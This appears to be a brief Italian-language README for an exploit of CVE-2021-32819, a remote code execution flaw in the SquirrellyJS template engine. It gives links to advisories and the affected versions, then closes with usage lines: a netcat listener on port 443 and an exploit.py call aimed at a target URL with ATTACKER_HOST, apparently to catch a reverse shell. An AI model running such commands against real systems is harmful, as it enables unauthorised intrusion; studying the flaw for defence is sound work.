
SquirrellyJS mescola dati puri del template con opzioni di configurazione del motore tramite l'API di rendering di Express. Sovrascrivendo opzioni di configurazione interne, è possibile innescare l'esecuzione di codice remoto nelle applicazioni downstream.
CVE-2021-32819 : SquirrellyJS mescola dati di template puri con opzioni di configurazione del motore attraverso l'API di rendering di Express. Sovrascrivendo opzioni di configurazione interne, l'esecuzione di codice remoto può essere innescata nelle applicazioni a valle.
https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
v8.0.0 >= v8.0.8 Esecuzione di codice remoto
Ubuntu 20.04.1
nc -lvp 443
python3 exploit.py http://example.com/ ATTACKER_HOST 443
